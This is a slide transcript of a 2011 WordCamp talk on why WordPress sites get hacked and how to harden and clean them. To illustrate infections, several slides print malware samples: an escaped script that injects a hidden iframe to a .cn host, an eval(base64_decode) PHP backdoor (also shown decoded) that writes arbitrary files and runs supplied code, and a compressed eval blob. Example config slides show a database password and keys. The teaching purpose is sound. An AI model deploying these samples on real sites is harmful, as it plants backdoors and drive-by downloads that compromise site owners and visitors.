The Great WordPress Lockdown presentation at WordCamp Melbourne February 2011.

1. The Great
WordPress
Lockdown
http://johnford.is/
@iamjohnford

2. OMG, my
site’s been
hacked.

3. “Help!
Spams are
eating
my site!”

6. “Help!
Spams are
eating
my site!”

7. “Did ninjas
do it?”

8. http://flic.kr/p/5AU3Lp

9. Smoking
Asthmatic
Clowns

10. S.A.C.s

11. Why do
S.A.C.s
exist?

12. What they
do...

15. document.write(unescape('%3C%69%66%72%61%6D
%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C
%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F
%67%6F%2E%70%68%70%3F%73%69%64%3D
%31%37%27%20%77%69%64%74%68%3D
%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F
%69%66%72%61%6D%65%3E'));

16. <iframe src='http://bl4ckst4r.cn/blog/go.php?
sid=17' width='0' height='0'></iframe>

17. <?php eval(base64_decode
("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FM
TCk7IGlmKCFlbXB0eSgkX1BPU1RbJ2RhdGEnXSkpIHsgJHBvc3RbJ2RhdGEnXSA9ICRfUE9TVFsnZGF0YS
ddOyBpZighZW1wdHkoJF9QT1NUWyd1cmwnXSkpIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyd1
cmwnXSk7ICR1cmxzX2FycmF5ID0gdW5zZXJpYWxpemUoJHRtcCk7ICR1cmwgPSBhcnJheV9zaGlmdCgkdX
Jsc19hcnJheSk7IGlmKCFlbXB0eSgkdXJsc19hcnJheSkgQU5EIGNvdW50KCR1cmxzX2FycmF5KT4wKSB7
ICR0bXAgPSBzZXJpYWxpemUoJHVybHNfYXJyYXkpOyAkcG9zdFsndXJsJ10gPSBiYXNlNjRfZW5jb2RlKC
R0bXApOyB9ICR0bXAgPSBwYXJzZV91cmwoJHVybCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBl
Y2hvICJ0cnlpbmcgdG8gdXBkYXRlIGZpbGVbICIuJHRtcFsncGF0aCddLiIgXSB2aWEgRlRQXG4iOyAkZm
lsZSA9ICd0bXAucGhwJzsgJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRwb3N0Wydk
YXRhJ10pKTsgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCRjb250ZW50Wydjb250ZW50J10pOyAkZnAgPS
Bmb3BlbigkZmlsZSwgJ3cnKTsgZndyaXRlKCRmcCwgJGNvbnRlbnQpOyBmY2xvc2UoJGZwKTsgY2htb2Qo
JGZpbGUsIDA3NzcpOyAkZnAgPSBmb3BlbigkZmlsZSwncicpOyAkcG9zdCA9IGZhbHNlOyB9IGVsc2Ugey
BlY2hvICJTZW5kaW5nIHJlcXVlc3QgdG86ICR1cmwgXG4iOyAkZnAgPSBmYWxzZTsgfSAkY29udGVudCA9
IHJlcXVlc3QoJHVybCwgJHBvc3QsICRmcCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBmY2xvc2
UoJGZwKTsgdW5saW5rKCRmaWxlKTsgfSBpZigkdG1wWydzY2hlbWUnXT09ImZ0cCIgQU5EICRjb250ZW50
IT09ZmFsc2UpIGVjaG8gIkZUUDogVVBEQVRFRFxuIjsgZWxzZSBlY2hvICRkZWxpbS4kY29udGVudDsgfS
BlbHNlIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJHBvc3RbJ2RhdGEnXSk7ICRkYXRhID0gdW5zZXJpYWxp
emUoJHRtcCk7IGlmKGVtcHR5KCRkYXRhKSBPUiAhaXNfYXJyYXkoJGRhdGEpKSB7IGV4aXQoIlNvbWUgZX
Jyb3Igd2hpbGUgc2F2aW5nOyIpOyB9IGZvcmVhY2ggKCRkYXRhIEFTICRkKSB7IGlmKGRpcm5hbWUoJGRb
J24nXSkhPScuJyBhbmQgIWZpbGVfZXhpc3RzKGRpcm5hbWUoJGRbJ24nXSkpKSB7IG1rZGlyKGRpcm5hbW
UoJGRbJ24nXSksIDA3NzcpOyBjaG1vZChkaXJuYW1lKCRkWyduJ10pLCAwNzc3KTsgfSBpZigkZFsnbidd
PT0nZXYnKSB7IGV2YWwoJGRbJ2MnXSk7IGNvbnRpbnVlOyB9ICRmID0gZm9wZW4oJGRbJ24nXSwgJ3cnKT
sgJGJ5dGVzX3dyaXR0ZW4gPSBmd3JpdGUoJGYsICRkWydjJ10pOyBmY2xvc2UoJGYpOyBpZihmaWxlc2l6
ZSgkZFsnbiddKT4xMCkgeyBlY2hvICJmaWxlOiIuJGRbJ24nXS4iOiBzYXZlZFxuIjsgfSBlbHNlIHsgZW
NobyAic29tZSBlcnJvciBoYXBwZW5zOiAiLiRkWyduJ10uIiBzaXplIGlzOiAiLmZpbGVzaXplKCRkWydu
J10pLiIgYnl0ZXNcbiI7IH0gaWYoIUBjaG1vZCgkZFsnbiddLCAwNzc3KSkgeyBlY2hvICJzb21lIGVycm
9yIHdpdGg6ICIuJGRbJ24nXS4iXG4iOyB9IH0gfSB9IGVsc2UgeyBkaWUoIk5PIERBVEEiKTsgfSBmdW5j

18. <?php
$delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST['data']))
{ $post['data'] = $_POST['data']; if(!empty($_POST['url'])) { $tmp = base64_decode
($_POST['url']); $urls_array = unserialize($tmp); $url = array_shift($urls_array);
if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array);
$post['url'] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp['scheme']
=="ftp") { echo "trying to update file[ ".$tmp['path']." ] via FTPn"; $file =
'tmp.php'; $content = unserialize(base64_decode($post['data'])); $content =
base64_decode($content['content']); $fp = fopen($file, 'w'); fwrite($fp,
$content); fclose($fp); chmod($file, 0777); $fp = fopen($file,'r'); $post =
false; } else { echo "Sending request to: $url n"; $fp = false; } $content =
request($url, $post, $fp); if($tmp['scheme']=="ftp") { fclose($fp); unlink
($file); } if($tmp['scheme']=="ftp" AND $content!==false) echo "FTP: UPDATEDn";
else echo $delim.$content; } else { $tmp = base64_decode($post['data']); $data =
unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error while
saving;"); } foreach ($data AS $d) { if(dirname($d['n'])!='.' and !file_exists
(dirname($d['n']))) { mkdir(dirname($d['n']), 0777); chmod(dirname($d['n']),
0777); } if($d['n']=='ev') { eval($d['c']); continue; } $f = fopen($d['n'], 'w');
$bytes_written = fwrite($f, $d['c']); fclose($f); if(filesize($d['n'])>10) { echo
"file:".$d['n'].": savedn"; } else { echo "some error happens: ".$d['n']." size
is: ".filesize($d['n'])." bytesn"; } if(!@chmod($d['n'], 0777)) { echo "some
error with: ".$d['n']."n"; } } } } else { die("NO DATA"); } function request
($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post
= is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST,
1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch,
CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); }
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error =
curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."n"; return false; }

22. I don’t
really give
a $#%*.

26. How did my
site get
S.A.C.ed?

27. Guess your
password

29. I saw John Ford speak at
WordCamp Melbourne 2011

30. I saw John Ford speak at
WordCamp Melbourne 2011
IsJFs@WCM2k11

31. I saw the awesome, loving,
generous, compassionate,
handsome, courteous,
thoughtful, modest John Ford
speak at WordCamp
Melbourne 2011
IstalgchctmJFs@WCM2k11

32. Exploit old
versions of
WordPress

34. Exploit
vulnerable
themes and
plugins

38. eval(gzuncompress(base64_decode('eJzcvdtyHMmSIPYOs/6H7Jo
+XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2pMkmnHZKa10
YN2fqX/
QL8gv0RERmRmASC7e6Ztjp0mKuPi4eHh4eER4eEezLZnQSjOxYcgzdJtP0gidym2z8+Pnzw9Oj/
fcZpOvSX8IJuusyyOmqvFqr6z4/ytE0ReuPaFs10v5u45f3ICALuOvCyIIwW6Pv/oxctVItK0vuN8/
bVTUQBSdBFoZMv56vVM+O1u39l3smQtEPRXrycT0XN7kPT81dOne5AwHHvDiQcJbfzqjYbD9sTIbo/
GYuYaCZ7w3WFHJWxBlU5XjLpGiU67782GkFA7iObpeulG9dQ5S9woDd0sTpyX4XoeRM7LJK5hcb8zG
baxBTdJ3Ovt2nGQpFmt4dROhRdHPv46WwQJ/TiO10m2oF/
BDH7s7G0pSjjHXXcya7e3kcBfvZ6KniA061+diMt7zqjfd76qY3vTXnswQ6Kk62maJduqbMMZ7ux94
SQiWyeR0x12nb
+Egcou3XA7L0l1G0674UBCKCKdtuPsOt0dwAeJ7A4Go8kYmhi2mar9cbuDVO0N6HviTgYdzK93221C
atYe93tTSOl0nd87PVmvP5sNuwJTzcR2u91D8uqSMAiz4Xg6ohaGA4LndrwZjmr9/
iyOMicNPor9Wr/mzFwPfhwkgRs2nG9FeCmywHOhOzA8u6lIglntwf1p0npwthDOyp0L5zpeA1H
+uBZpJnzHi9ehH72tZ85UAFvxoEK6mznZIkidLFiKJgyxcFPMv3bcuQuDjYWSpnMaJ5A0AybIADxMg
zi6FFEgIi+vlAjXZ1huAriFAih733UWiZjt1xZZtrrXak3DeN7M3ASAR24T
+L4VRL74gHOo5SbeIrgUrTWkACe5kR9E891M89+uSBL4F/vWwr4+MFjzCLPS+63pg/
st90GDMPVF5gYhYBP5jviwCqFF5LcmUYn+2XIeB8I5FUEmGo4PP/21cykSKDnPgGoN5+L/+6f/
N4oy4USBt8iwSLp0QwdSp4CiyD5mzpVIfBE1nUdBBuVeQ/
LaWzhXgYBOOOkKihIBAdd1EsydGSQk1NaryI0isViGAPoCULDweuo6WBWmm
+vACDppDMWCzE0Rl9gBaq9iP4ESLo6lv/aCxBGRg0MNIymWqxiGBWgwcy/

39. File
permissions
http://codex.wordpress.org/Changing_File_Permissions

40. // ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wcnyc2010');
/** MySQL database username */
define('DB_USER', 'wcnyc2010');
/** MySQL database password */
define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');
/** MySQL hostname */
define('DB_HOST', 'mysql.myserver.com');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

42. /**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/
WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force
all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
define('SECURE_AUTH_KEY', '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
define('LOGGED_IN_KEY', '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
define('NONCE_KEY', 'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
define('AUTH_SALT', 'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
define('LOGGED_IN_SALT', 'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
define('NONCE_SALT', 'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');

47. http://wiki.mediatemple.net/w/File_Permissions

48. http://wiki.mediatemple.net/w/File_Permissions

49. Obscurity

53. Cross tool
exploits

54. Multiple
sites on the
same server

55. Use a
different
database
user/pass for
each site

56. Hardening
WordPress
http://codex.wordpress.org/Hardening_WordPress

57. “What do
I do?”

58. Contact
your host

59. Back up
your
exploited
site

60. FAQ My
site was
hacked
http://codex.wordpress.org/FAQ_My_site_was_hacked

61. Change all
passwords
and keys

62. // ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordcamp');
/** MySQL database username */
define('DB_USER', 'wordcamp');
/** MySQL database password */
define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');
/** MySQL hostname */
define('DB_HOST', 'mysql.myserver.com');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

63. /**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/
WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force
all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
define('SECURE_AUTH_KEY', '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
define('LOGGED_IN_KEY', '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
define('NONCE_KEY', 'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
define('AUTH_SALT', 'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
define('LOGGED_IN_SALT', 'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
define('NONCE_SALT', 'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');

64. Remove
rogue code

65. http://wordpress.org/extend/plugins/exploit-scanner/

66. Subversion
http://codex.wordpress.org/Installing/
Updating_WordPress_with_Subversion

67. machine:www user$ svn status
? wp-config.php
? .htaccess
M index.php
? wp-content/cache
X wp-content/plugins/akismet
M wp-content/themes/twentyten/404.php
? wp-admin/meta
Performing status on external item at 'wp-content/plugins/akismet'

68. machine:www user$ svn diff wp-content/themes/twentyten/404.php
Index: wp-content/themes/twentyten/404.php
===================================================================
--- wp-content/themes/twentyten/404.php (revision 15819)
+++ wp-content/themes/twentyten/404.php (working copy)
@@ -1,3 +1,5 @@
+<?php echo "<h1>Here's some code that really shouldn't be here</h1>"; ?>
+
<?php
/**
* The template for displaying 404 pages (Not Found).

70. Check file
permissions

71. Restore
from
backup

72. YOU HAZ BACKUP, RIGHT?
http://flic.kr/p/DC3Q

74. http://flic.kr/p/5AU3Lp

75. Thank you!
http://johnford.is/
@iamjohnford